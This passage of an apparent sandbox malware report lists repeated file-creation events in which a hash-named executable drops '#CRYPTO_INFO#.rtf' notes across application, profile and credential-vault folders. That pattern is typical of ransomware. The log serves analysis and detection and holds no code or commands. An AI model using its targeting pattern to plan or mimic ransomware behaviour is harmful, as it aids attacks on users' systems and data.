8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\w0w630d3.default-release\datareporting\archived\2020-07\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\AccountPictures\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\jfr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\#CRYPTO_INFO#.rtf 